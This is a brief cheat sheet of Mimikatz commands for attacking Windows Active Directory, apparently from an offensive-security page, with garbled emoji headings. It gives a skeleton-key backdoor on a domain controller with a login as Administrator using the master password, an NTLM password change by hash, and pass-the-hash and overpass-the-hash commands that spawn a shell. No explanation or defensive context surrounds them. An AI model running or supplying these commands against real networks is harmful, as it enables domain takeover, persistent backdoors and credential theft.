๐ ๏ธ Advanced Techniques
๐ป Skeleton Key Attack
# Install skeleton key
misc::skeleton
# Authenticate with any user
net use \\dc01\c$ /user:Administrator mimikatz
๐ Password Change
# Change password with NTLM
lsadump::changentlm /user:Administrator /oldntlm:OLD_HASH /newntlm:NEW_HASH
๐ฏ Pass-the-Hash Variants
# Classic PtH
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# PtH with AES
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe
๐ OverPass-the-Hash
# Convert NTLM to TGT
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe